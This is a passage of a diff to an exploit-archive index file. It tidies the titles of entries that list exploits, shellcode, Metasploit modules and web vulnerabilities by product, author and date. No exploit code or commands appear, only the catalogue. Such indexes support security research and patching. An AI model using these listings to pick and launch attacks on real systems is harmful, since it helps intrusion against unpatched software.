Injection",2011-11-24,X-Cisadane,php,webapps,0 +36351,platforms/php/webapps/36351.txt,"Balitbang CMS 3.3 - alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36352,platforms/linux/remote/36352.txt,"Apache 7.0.x 'mod_proxy'- Reverse Proxy Security Bypass",2011-11-24,"Prutha Parikh",linux,remote,0 -36353,platforms/jsp/webapps/36353.txt,"HP Network Node Manager i 9.10 - nnm/mibdiscover node Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 -36354,platforms/jsp/webapps/36354.txt,"HP Network Node Manager i 9.10 - nnm/protected/configurationpoll.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 -36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager i 9.10 - nnm/protected/ping.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 -36356,platforms/jsp/webapps/36356.txt,"HP Network Node Manager i 9.10 - nnm/protected/statuspoll.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 -36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager i 9.10 - nnm/protected/traceroute.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 +36353,platforms/jsp/webapps/36353.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/mibdiscover node Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 +36354,platforms/jsp/webapps/36354.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/configurationpoll.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 +36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/ping.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 +36356,platforms/jsp/webapps/36356.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/statuspoll.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 +36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/traceroute.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - Cross-Site Request Forgery",2015-03-11,"Luis Santana",php,webapps,0 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 36360,platforms/windows/remote/36360.rb,"Adobe Flash Player - ByteArray UncompressViaZlibVariant Use-After-Free (Metasploit)",2015-03-12,Metasploit,windows,remote,0 @@ -32958,7 +32958,7 @@ id,file,description,date,author,platform,type,port 36434,platforms/php/webapps/36434.txt,"WordPress Plugin GRAND FlAGallery 1.57 - 'flagshow.php' Cross-Site Scripting",2011-12-12,Am!r,php,webapps,0 36435,platforms/php/webapps/36435.txt,"Chamilo LMS 1.9.10 - Multiple Vulnerabilities",2015-03-19,"Rehan Ahmed",php,webapps,80 36436,platforms/java/webapps/36436.txt,"EMC M&R (Watch4net) - Credential Disclosure",2015-03-19,"Han Sahin",java,webapps,0 -36437,platforms/windows/local/36437.rb,"Publish-It - PUI Buffer Overflow (SEH)",2015-03-19,Metasploit,windows,local,0 +36437,platforms/windows/local/36437.rb,"Publish-It - '.PUI' Buffer Overflow (SEH)",2015-03-19,Metasploit,windows,local,0 36438,platforms/php/remote/36438.rb,"TWiki Debugenableplugins - Remote Code Execution (Metasploit)",2015-03-19,Metasploit,php,remote,80 36439,platforms/php/webapps/36439.txt,"Joomla! Plugin eCommerce-WD 1.2.5 - SQL Injection",2015-03-19,"Brandon Perry",php,webapps,80 36440,platforms/java/webapps/36440.txt,"EMC M&R (Watch4net) - Directory Traversal",2015-03-19,"Han Sahin",java,webapps,58080 @@ -33004,7 +33004,7 @@ id,file,description,date,author,platform,type,port 36488,platforms/php/webapps/36488.txt,"WordPress Plugin WHOIS 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 40453,platforms/multiple/dos/40453.py,"ISC BIND 9 - Denial of Service",2016-10-04,Infobyte,multiple,dos,53 -36490,platforms/php/webapps/36490.py,"WordPress Plugin WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 +36490,platforms/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0 36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI redirection",2012-01-04,"Mesut Timur",php,webapps,0 @@ -33012,7 +33012,7 @@ id,file,description,date,author,platform,type,port 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0 36497,platforms/php/webapps/36497.txt,"UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 -36498,platforms/php/webapps/36498.txt,"Yaws 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 +36498,platforms/php/webapps/36498.txt,"Yaws-Wiki 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 36499,platforms/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 - Directory Traversal",2012-01-05,demonalex,windows,remote,0 36501,platforms/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",windows,local,0 @@ -33068,7 +33068,7 @@ id,file,description,date,author,platform,type,port 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 -36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition",2015-04-14,"Tavis Ormandy",linux,local,0 +36747,platforms/linux/local/36747.c,"Abrt (Fedora 21) - Race Condition",2015-04-14,"Tavis Ormandy",linux,local,0 36559,platforms/php/webapps/36559.txt,"WordPress Plugin aspose-doc-exporter 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0 36560,platforms/php/webapps/36560.txt,"Joomla! Component Gallery WD - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0 36561,platforms/php/webapps/36561.txt,"Joomla! Component Contact Form Maker 1.0.1 - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0 @@ -33112,7 +33112,7 @@ id,file,description,date,author,platform,type,port 36600,platforms/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla! Component Spider Random Article - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 36620,platforms/php/webapps/36620.txt,"WordPress Plugin YouSayToo auto-publishing 1.0 - 'submit' Parameter Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 -36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36602,platforms/windows/remote/36602.html,"WebGate WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 @@ -33274,7 +33274,7 @@ id,file,description,date,author,platform,type,port 36773,platforms/windows/dos/36773.c,"Microsoft Windows - 'HTTP.sys' PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 36774,platforms/php/webapps/36774.txt,"WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (1)",2015-04-15,"Necmettin COSKUN",php,webapps,0 36807,platforms/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",php,webapps,80 -36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 +36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80 36777,platforms/php/webapps/36777.txt,"WordPress Plugin Ajax Store Locator 1.2 - SQL Injection",2015-04-16,"Claudio Viviani",php,webapps,80 36778,platforms/lin_x86/shellcode/36778.c,"Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",lin_x86,shellcode,0 36779,platforms/win_x86/shellcode/36779.c,"Win32/XP SP3 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",win_x86,shellcode,0 @@ -33285,7 +33285,7 @@ id,file,description,date,author,platform,type,port 36785,platforms/php/webapps/36785.txt,"11in1 CMS 1.2.1 - admin/index.php class Parameter Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36786,platforms/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Cross-Site Request Forgery (Admin Password)",2012-02-15,"High-Tech Bridge SA",php,webapps,0 36787,platforms/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross-Site Scripting",2012-02-15,"High-Tech Bridge SA",php,webapps,0 -36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In DOCX File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0 +36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In '.DOCX' File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0 36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial Of Service",2011-12-18,anonymous,php,dos,0 36790,platforms/php/webapps/36790.txt,"Tube Ace - 'q' Parameter Cross-Site Scripting",2012-02-16,"Daniel Godoy",php,webapps,0 36791,platforms/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection",2012-02-16,tempe_mendoan,php,webapps,0 @@ -33333,7 +33333,7 @@ id,file,description,date,author,platform,type,port 36834,platforms/php/webapps/36834.txt,"Joomla! Component X-Shop - 'idd' Parameter SQL Injection",2012-02-18,KedAns-Dz,php,webapps,0 36835,platforms/php/webapps/36835.txt,"Joomla! Component Xcomp 'com_xcomp' - Local File Inclusion",2012-02-18,KedAns-Dz,php,webapps,0 36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution (PoC)",2015-04-27,"Jay Turla",multiple,remote,0 -36837,platforms/windows/local/36837.rb,"iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 +36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0 36844,platforms/php/webapps/36844.txt,"WordPress 4.2 - Persistent Cross-Site Scripting",2015-04-27,klikki,php,webapps,0 36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0 36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0 @@ -33665,7 +33665,7 @@ id,file,description,date,author,platform,type,port 37189,platforms/php/webapps/37189.txt,"Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37190,platforms/php/webapps/37190.txt,"Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37191,platforms/php/webapps/37191.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_layer.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 -37192,platforms/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 for - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 +37192,platforms/php/webapps/37192.txt,"WordPress Plugin Leaflet Maps Marker 0.0.1 - leaflet_marker.php id Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37193,platforms/php/webapps/37193.txt,"Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 37194,platforms/php/webapps/37194.txt,"Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities",2012-05-15,"Heine Pedersen",php,webapps,0 37195,platforms/php/webapps/37195.txt,"WordPress Plugin WP Forum Server 1.7.3 - fs-admin/fs-admin.php Multiple Parameter Cross-Site Scripting",2012-05-15,"Heine Pedersen",php,webapps,0 @@ -34174,7 +34174,7 @@ id,file,description,date,author,platform,type,port 37750,platforms/php/webapps/37750.txt,"WDS CMS - SQL Injection",2015-08-10,"Ismail Marzouk",php,webapps,80 37746,platforms/windows/remote/37746.py,"Netsparker 2.3.x - Remote Code Execution",2015-08-09,"Hesam Bazvand",windows,remote,0 37754,platforms/php/webapps/37754.txt,"WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 -37755,platforms/windows/local/37755.c,"Microsoft Windows 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 +37755,platforms/windows/local/37755.c,"Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",windows,local,0 37947,platforms/multiple/remote/37947.txt,"Litespeed Web Server - 'gtitle' Parameter Cross-Site Scripting",2012-03-12,K1P0D,multiple,remote,0 37948,platforms/php/webapps/37948.txt,"WordPress Plugin Slideshow - Multiple Cross-Site Scripting Vulnerabilities",2012-10-17,waraxe,php,webapps,0 37949,platforms/linux/remote/37949.txt,"ModSecurity - POST Parameters Security Bypass",2012-10-17,"Bernhard Mueller",linux,remote,0 @@ -34195,7 +34195,7 @@ id,file,description,date,author,platform,type,port 37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0 37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0 37771,platforms/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - SEH Based Overflow",2015-08-15,St0rn,windows,local,0 -37772,platforms/multiple/local/37772.js,"Mozilla Firefox < 39.03 - pdf.js Same Origin Policy Exploit",2015-08-15,"Tantaryu MING",multiple,local,0 +37772,platforms/multiple/local/37772.js,"Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy Exploit",2015-08-15,"Tantaryu MING",multiple,local,0 37773,platforms/php/webapps/37773.txt,"Joomla! Component com_memorix - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 37774,platforms/php/webapps/37774.txt,"Joomla! Component com_informations - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 37775,platforms/windows/dos/37775.py,"Ability FTP Server 2.1.4 - afsmain.exe USER Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0 @@ -34368,7 +34368,7 @@ id,file,description,date,author,platform,type,port 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin)",2015-08-24,"Arash Khazaei",php,webapps,80 37956,platforms/php/webapps/37956.txt,"WordPress Theme GeoPlaces3 - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 37957,platforms/windows/dos/37957.txt,"GOM Audio 2.0.8 - '.gas' Crash (PoC)",2015-08-24,Un_N0n,windows,dos,0 -37958,platforms/multiple/remote/37958.rb,"Mozilla Firefox - pdf.js Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,multiple,remote,0 +37958,platforms/multiple/remote/37958.rb,"Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,multiple,remote,0 37959,platforms/php/webapps/37959.txt,"BSW Gallery - 'uploadpic.php' Arbitrary File Upload",2012-10-18,"cr4wl3r ",php,webapps,0 37960,platforms/php/webapps/37960.txt,"Amateur Photographer's Image Gallery - force-download.php file Parameter Information Disclosure",2012-10-18,"cr4wl3r ",php,webapps,0 37961,platforms/php/webapps/37961.txt,"Amateur Photographer's Image Gallery - plist.php albumid Parameter SQL Injection",2012-10-18,"cr4wl3r ",php,webapps,0 @@ -34637,7 +34637,7 @@ id,file,description,date,author,platform,type,port 38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0 38246,platforms/php/webapps/38246.txt,"iCart Pro - 'section' Parameter SQL Injection",2013-01-25,n3tw0rk,php,webapps,0 38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV - Information Disclosure",2013-01-29,"Alejandro Ramos",multiple,remote,0 -38249,platforms/multiple/dos/38249.txt,"MiniUPnP - Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0 +38249,platforms/multiple/dos/38249.txt,"MiniUPnP 1.4 - Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 38251,platforms/php/webapps/38251.txt,"WordPress Plugin WP-Table Reloaded - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 @@ -34733,7 +34733,7 @@ id,file,description,date,author,platform,type,port 38348,platforms/windows/dos/38348.txt,"Adobe Flash - No Checks on Vector. Capacity Field",2015-09-28,"Google Security Research",windows,dos,0 38349,platforms/windows/local/38349.py,"IconLover 5.42 - Local Buffer Overflow",2015-09-29,cor3sm4sh3r,windows,local,0 38350,platforms/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421 / 04.01.04-422 - Command Injection",2015-09-29,absane,hardware,webapps,0 -38351,platforms/asp/webapps/38351.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",asp,webapps,0 +38351,platforms/asp/webapps/38351.txt,"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",asp,webapps,0 38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer - Remote Code Execution (Metasploit)",2015-09-29,Metasploit,windows,remote,8400 38353,platforms/linux/local/38353.txt,"Apport 2.19 (Ubuntu 15.04) - Privilege Escalation",2015-09-29,halfdog,linux,local,0 38354,platforms/php/webapps/38354.txt,"Plogger - Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 @@ -34908,7 +34908,7 @@ id,file,description,date,author,platform,type,port 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local,0 38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 38534,platforms/php/webapps/38534.php,"Joomla! 3.2.x < 3.4.4 - SQL Injection",2015-10-26,"Manish Tanwar",php,webapps,0 -38535,platforms/osx/remote/38535.rb,"Safari - User-Assisted Applescript Exec Attack (Metasploit)",2015-10-26,Metasploit,osx,remote,0 +38535,platforms/osx/remote/38535.rb,"Apple Safari - User-Assisted Applescript Exec Attack (Metasploit)",2015-10-26,Metasploit,osx,remote,0 38538,platforms/multiple/dos/38538.py,"Code::Blocks - Denial of Service",2013-05-29,ariarat,multiple,dos,0 38644,platforms/windows/remote/38644.txt,"SolarWinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution",2015-11-06,"Chris Graham",windows,remote,0 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - Cross-Site Request Forgery",2015-11-06,hyp3rlinx,jsp,webapps,0 @@ -35148,7 +35148,7 @@ id,file,description,date,author,platform,type,port 38784,platforms/php/webapps/38784.txt,"Alienvault Open Source SIEM (OSSIM) - 'Timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0 38785,platforms/php/webapps/38785.pl,"vBulletin 4.1.x - '/install/upgrade.php' Security Bypass",2013-10-13,"Joshua Rogers",php,webapps,0 38786,platforms/php/webapps/38786.txt,"Ziteman CMS - Login Page SQL Injection",2013-10-10,"Ashiyane Digital Security Team",php,webapps,0 -38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption",2015-11-23,"Francis Provencher",windows,dos,0 +38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - '.PDF' Parsing Memory Corruption",2015-11-23,"Francis Provencher",windows,dos,0 38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (1)",2015-11-23,"Francis Provencher",windows,dos,0 38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (2)",2015-11-23,"Francis Provencher",windows,dos,0 38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution",2015-11-23,"Mohammad Reza Espargham",php,webapps,80 @@ -35239,7 +35239,7 @@ id,file,description,date,author,platform,type,port 38880,platforms/php/webapps/38880.txt,"Veno File Manager - 'q' Parameter Arbitrary File Download",2013-12-11,"Daniel Godoy",php,webapps,0 38881,platforms/php/webapps/38881.html,"Piwigo - admin.php Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,php,webapps,0 38882,platforms/cgi/webapps/38882.txt,"Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service",2013-12-16,"DTAG Group Information Security",cgi,webapps,0 -38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder - (QuickWeb) 1.0 apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 +38883,platforms/asp/webapps/38883.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - apps/news-events/newdetail.asp id Parameter SQL Injection",2013-12-13,R3d-D3V!L,asp,webapps,0 38884,platforms/asp/webapps/38884.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass",2013-12-13,R3d-D3V!L,asp,webapps,0 38885,platforms/php/webapps/38885.txt,"iScripts AutoHoster - /checktransferstatus.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0 38886,platforms/php/webapps/38886.txt,"iScripts AutoHoster - /checktransferstatusbck.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0 @@ -35488,7 +35488,7 @@ id,file,description,date,author,platform,type,port 39142,platforms/jsp/webapps/39142.txt,"Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 39143,platforms/jsp/webapps/39143.txt,"Xangati - /servlet/Installer file Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 39144,platforms/windows/dos/39144.html,"Microsoft Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of Service",2015-12-31,"Marcin Ressel",windows,dos,0 -39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0 +39145,platforms/cgi/webapps/39145.txt,"Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0 39147,platforms/osx/local/39147.c,"Apple Mac OSX - Local Security Bypass",2014-04-22,"Ian Beer",osx,local,0 39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash (PoC)",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0 @@ -35507,10 +35507,10 @@ id,file,description,date,author,platform,type,port 39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0 -39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 -39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 +39162,platforms/multiple/dos/39162.txt,"pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 +39163,platforms/multiple/dos/39163.txt,"pdfium - CPDF_TextObject::CalcPositionData Heap Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0 39164,platforms/multiple/dos/39164.txt,"pdfium IsFlagSet (v8 memory management) - SIGSEGV Exploit",2016-01-04,"Google Security Research",multiple,dos,0 -39165,platforms/multiple/dos/39165.txt,"pdfium CPDF_Function::Call - Stack Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0 +39165,platforms/multiple/dos/39165.txt,"pdfium - CPDF_Function::Call Stack Based Buffer Overflow",2016-01-04,"Google Security Research",multiple,dos,0 39166,platforms/linux/local/39166.c,"Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Privilege Escalation (1)",2016-01-05,rebel,linux,local,0 39167,platforms/php/webapps/39167.txt,"Online Airline Booking System - Multiple Vulnerabilities",2016-01-05,"Manish Tanwar",php,webapps,80 39168,platforms/php/webapps/39168.txt,"Simple PHP Polling System - Multiple Vulnerabilities",2016-01-05,WICS,php,webapps,80 @@ -35670,7 +35670,7 @@ id,file,description,date,author,platform,type,port 40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306 39328,platforms/android/remote/39328.rb,"Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555 39329,platforms/windows/dos/39329.py,"InfraRecorder - '.m3u' File Buffer Overflow",2014-05-25,"Osanda Malith",windows,dos,0 -39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 +39330,platforms/windows/dos/39330.txt,"Foxit Reader 7.2.8.1124 - '.PDF' Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0 39331,platforms/windows/dos/39331.pl,"TFTPD32 / Tftpd64 - Denial Of Service",2014-05-14,j0s3h4x0r,windows,dos,0 39441,platforms/multiple/webapps/39441.txt,"Oracle GlassFish Server 4.1 - Directory Traversal",2015-08-27,"Trustwave's SpiderLabs",multiple,webapps,4848 39332,platforms/php/webapps/39332.txt,"Wiser Backup - Information Disclosure",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35842,7 +35842,7 @@ id,file,description,date,author,platform,type,port 39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crashes (PoC)",2016-03-01,"Shantanu Khandelwal",windows,dos,0 